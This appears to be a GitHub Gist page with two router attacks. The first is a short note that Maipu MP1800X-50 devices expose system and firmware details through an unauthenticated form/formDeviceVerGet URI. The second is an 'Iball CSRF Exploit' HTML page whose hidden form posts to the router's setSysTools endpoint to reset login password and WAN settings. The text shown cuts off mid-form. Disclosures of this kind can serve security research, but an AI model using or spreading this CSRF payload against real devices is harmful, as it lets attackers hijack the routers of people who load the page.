Skip to content

Instantly share code, notes, and snippets.

The web interface of Maipu MP1800X-50 7.5.3.14(R) devices allows
remote attackers to obtain sensitive information via the
form/formDeviceVerGet URI, such as system id, hardware model, hardware
version, bootloader version, software version, software image file,
compilation time, and system uptime.
The attacker just has to create a request to
http://routerip/form/formDeviceVerGet
@Saket-taneja
Saket-taneja / iballcsrf.html
Created June 27, 2020 15:15
Iball CSRF Exploit
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/goform/setSysTools" method="POST">
<input type="hidden" name="module1" value="loginAuth" />
<input type="hidden" name="newPwd" value="" />
<input type="hidden" name="oldPwd" value="" />
<input type="hidden" name="module2" value="wanAdvCfg" />
<input type="hidden" name="wanServerName" value="" />
<input type="hidden" name="wanServiceName" value="excitel" />